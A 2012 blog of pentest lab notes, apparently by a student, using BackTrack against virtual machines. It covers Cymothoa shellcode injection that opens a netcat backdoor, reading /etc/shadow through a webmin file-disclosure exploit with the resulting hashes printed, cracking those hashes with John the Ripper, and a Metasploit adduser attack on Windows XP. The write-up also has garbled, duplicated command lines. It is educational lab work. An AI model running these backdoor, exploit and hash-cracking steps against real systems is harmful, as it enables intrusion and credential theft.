Senin, 30 Januari 2012

Cymothoa – Inject Shellcode into UBUNTU nc + mkfifo

Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.


1. RUN cymothoa before that you must Run your Ubuntu on your Virtual BOX
2. RUN NC
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321
3.  we must make mkfifo file because will help us to comunicate with nc in Ubuntu (version nc in BT is different with nc in UBUNTU).
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321



4. root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321


3.  and now LS in console of BT

we can see, BT can access shell Ubuntu

4. now we must sent cymatho into Ubuntu using nc
Open new terminal
    - copy file cymothoa  from /pentest/backdoors/cymothoa  
       root@bt:~# cd /pentest/backdoors/cymothoa/
       root@bt:/pentest/backdoors/cymothoa# cp cymothoa /home/
Create file .tar
       root@bt:/home# tar -cvf myfile.tar cymothoa
       root@bt:/home# ls
       cymothoa  myfile.tar  tes
OK we have file .rar
 we will sent this file.rar into Ubuntu.

root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878
and on terminal Ubuntu

root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878
Ok transfer file cymothoa  SUKSES
Now open terminal BT

5.  Ekstrak File .Tar
After that

./cymothoa



6. ps -aux
search ID /bin/bash..
.  We get ID 1326

7. ./cymothoa -p 1326 -s 0 -y 54321
Ok Success  :D
GOOD LUCK

Crack /etc/shadow using JRT

JOHN THE RIPPER
After trying somes ways how to crack password /etc/shadow using John the ripper, finally  I got a way which, although not yet managed to perfect.
On this case i have two user, there are user normal and user root.

1. first

root@sinobi:/etc#
to see passwd and shadow

2.  root@sinobi:/etc# cat passwd

we can see user root  and tes

root@sinobi:/etc# cat shadow


we can see the difference between passwd and shadowhere it is clear that data on the shadow password has been strongly protected.

3.  run John The Ripper

root@sinobi:/pentest/passwords/john# cp /etc/passwd passwd
root@sinobi:/pentest/passwords/john# cp /etc/shadow shadow
4. Merging the "passwd" and "shadow" files
root@sinobi:/pentest/passwords/john# ./unshadow passwd shadow  > crack_file
5. CRACKING THE PASSWORD

we can see that the only one who can crack passwords whereas the root password can not be on crack.

PRIVILEGE ESCALATION Host 192.168.0.122



THE STEPS
  1. INFORMATION GATHERING
    i'm looking Information Gathering by Nmap and I was get informatin about :

    On the picture we can see information about :
    Service and Prot who is running in the host.
  2. SERVICE ENUMERATION
    now we know service who is running in the host. Like that
    Port 22 Service SSH
    Port 80 Service HTTP
    Port 139 Service netbios-ssn Samba
    Port 445 Service netbios-ssn Samba
    Port 10000/tcp Service HTTP
  3. VULNERABILITY IDENTIFICATION
    For VA, on this time I using NESSUS
    because i'm looking for information about username and password is the web application,I took the initiative to see the vulnerability of the port 10000 and I get a vulnerability in there.
    then i try look at browser http://192.168.0.112 and show screen picture
    After that i try open port by http://192.168.0.112:10000 and show screen picture
    i'm sorry about this picture but a right picture is behind terminal. we can see form login who need user name and password.

    from information nessu i know, i must looking for webmin and looking for it by metasploit.db

    root@sinobi:/pentest/exploits/exploitdb# 
    root@sinobi:/pentest/exploits/exploitdb# ./searchsploit webmin

    after that 
    root@sinobi:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl
    after we copy the file, now we can open the file  for example use kwrite :
    this is file from 2017.pl and this file by language perl program.
    after read about this file you must know about http = 0  and https = 1 . this informatin will using when we run command. like that :

    root@sinobi:/home#perl 2017.pl ip port /etc/password http/https

    root@sinobi:/home#perl 2017.pl 192.168.0.112 10000 /etc/password 0
    and result of the command are :


    vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
    obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
    osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
    yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

    the information we get from /etc/shadow

    Ok in the next lesson i will explain how to encryp password using JTR



Jumat, 27 Januari 2012

exploitation by msf On Virtual Box (xp)

1. First

  • we must know ip windows xp on Virtual Box
IP  192.168.56.101

  • Now we will Scan the Ip Address by using Nmap and  Nessus
by Nmap
by Nessus
On the Picture we can see the service who is running
I choose smb


Why I use NETAPI ??
Because i get information in nessus.. we can see in the picture where i block :


Set PAYLOAD
set PAYLOAD windows/adduser

I have created a new user :D

Good Luck

Vulnerabililty process until Eksploitations process

 
Vulnerabililty process until Eksploitations process

After collecting the information gathering and saw service enumirationthen we willlook for loopholes Vulnarbility or system that is a weakness that allows for theexploitation done on the target computer.

In this case we will use some tools of Nessus and NmapBoth tools are verysupportive to perform Vulnerability scanners.

Previously I apologize for my writing this time .. not equipped with a screenshot of the results of execution of Nmap in Terminal because I forgot to do sobut I'll give anotherexample of a common purpose.



First
NMAP scanning
1.    I will do the scanner to the network.
       sinobi root @~ # nmap-sV 192.168.0.0/24
Which produces IP
192.168.0.21
192.168.0.26
192.168.0.32
192.168.0.35
192.168.0.40
192.168.0.43
192.168.0.44
192.168.0.45
192.168.0.63
192.168.0.64
192.168.0.65
192.168.0.66
192.168.0.67
192.168.0.70
192.168.0.71
Here in the show 15 Host is currently activeAs an example results in the show by using nmap-sV


From this process we can look at some of the essential informationsuch as:
IP addresses
Port / Service is running etc.



=======================================================================
second
Nessus
1. Run the Nessus
- Open the Browser
- The type the URL https://127.0.0.1
- It will appear



enter your username and password.
- On the Scan menu, click Add. Then it will show



Please fill in your name on the column name as your wishthe column type (run now),select the column policy (external network scansand enter the target IP scan will be scannedIn this case 192.168.0.0/24it will do the scanning terhapat networkThe reason why I use nmap is also to ensure that all hosts have been recorded byNessus.
2. After the scanning processit will display menu

look here there are 15 hosts are active, results of the nmap scanning and Nessus scanning results is the same.
3. Repot the results of the first ip is 192.168.0.22



look here there are 9 currently running services, such as:
- icmp
- tcp
- udp
- ssh
- www
- Netbios-ns
- smb
- cifs
-www



    I will explain the results of the analysis nessus on ssh service running on port 22
Synopsis: A SSH server is running on the remote host.

>> SSH / PORT 22
      ssh port is divided into 5
    *** Debian openSSH/openSSL package random number generator weakness


        Explanation
        Synopsis: The remote SSH host keys are weak.
        Description
       The remote SSH host key has been generated on a Debian 
       or Ubuntu system which contains a bug in the random number
       generator of its OpenSSL library.


       The problem is due to a Debian packager removing nearly all
       sources of entropy in the remote version of OpenSSL.


       An attacker can easily obtain the private part of the remote
       key and use this to set up decipher the remote session  or
       set up a man in the middle attack.


      Solution
      Consider all cryptographic material generated on the remote host
      to be guessable. In particuliar, all SSH, SSL and OpenVPN key
      material should be re-generated.
   conclusion
   there is a vulnerability

    *** SSH Server type and version information
        Synopsis: An SSH server is listening on this port.


       Description
       It is possible to obtain information about the remote SSH
       server by sending an empty authentication request.


       Solution
       n/a


       Risk Factor: None


       Plugin Output
       SSH version : SSH-2.0-OpenSSH_4.6p1 Debian-5build1
       SSH supported authentication : publickey,password


       Plugin Publication Date: 1999/10/12


       Plugin Last Modification Date: 2011/10/24
       conclusion
    there is'nt a vulnerability

    *** Service Detection
         Synopsis: The remote service could be identified.

       Description
       It was possible to identify the remote service by its banner or by looking
       at the error message it sends when it receives an HTTP request.

       Solution
       n/a

      Risk Factor: None

      Plugin Output
      An SSH server is running on this port.

      Plugin Publication Date: 2007/08/19

      Plugin Last Modification Date: 2012/01/19
       conclusion
    there is'nt a vulnerability
    *** SSH Protocol Versions Supported
        Synopsis: A SSH server is running on the remote host.


        Description
        This plugin determines the versions of the SSH protocol supported by
        the remote SSH daemon.


        Solution
        n/a


        Risk Factor: None


        Plugin Output
        The remote SSH daemon supports the following versions of the
        SSH protocol :


       - 1.99
       - 2.0




     SSHv2 host key fingerprint : 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d


      Plugin Publication Date: 2002/03/06


      Plugin Last Modification Date: 2011/03/30
       conclusion
    there is'nt a vulnerability
    *** Backported Security Patch Detection (SSH)
         Synopsis: Security patches are backported.


         Description
         Security patches may have been 'back ported' to the remote SSH server
         without changing its version number. 


         Banner-based checks have been disabled to avoid false positives.


         Note that this test is informational only and does not denote any 
         security problem.
  
         Solution
         N/A


        See Also
        http://www.nessus.org/u?d636c8c7


        Risk Factor: None


        Plugin Output
        Give Nessus credentials to perform local checks.


        Plugin Publication Date: 2009/06/25
       conclusion
    there is'nt a vulnerability

>> WWW / PORT 80


there are vulnerability
*** Plugin ID 34850
    Name Web Server Uses Basic Authentivication without HTTPS  
***  Plugin ID 46803
     Name PHP expose _php Information Disclosure
***  Plugin ID 11213
     Name  HTTP TRACE / TRACK Methods Allowed
 >> WWW / PORT 80
 *** Plugin ID 10394
     Name Microsoft windows SMB Log In Possible
***Plugin ID 10859
     Name Microsoft windows SMB LsaQueryinformationPolicy function SID enumuration
>> WWW / PORT 10000
*** Plugin ID 10757
     Name Webmin Detection
*** Plugin ID 22300
     Name Webmin / Usermin Null Byte Filtering Vulnerbilities
*** Plugin ID 21785
     Name 
Webmin / Usermin miniserv.pl albitrary file Disclosure




4. Trying vulnerability with making ExploitDB
FOr example

root@sinobi:/pentest/exploits/exploitdb# ./searchsploit smb    then
root@sinobi:/pentest/exploits/exploitdb# cd platforms/windows/remote/14
root@sinobi:/pentest/exploits/exploitdb# cd platforms/windows/remote/14674.txt
root@sinobi:/pentest/exploits/exploitdb# cat /14674.txt to get information hot exploit it.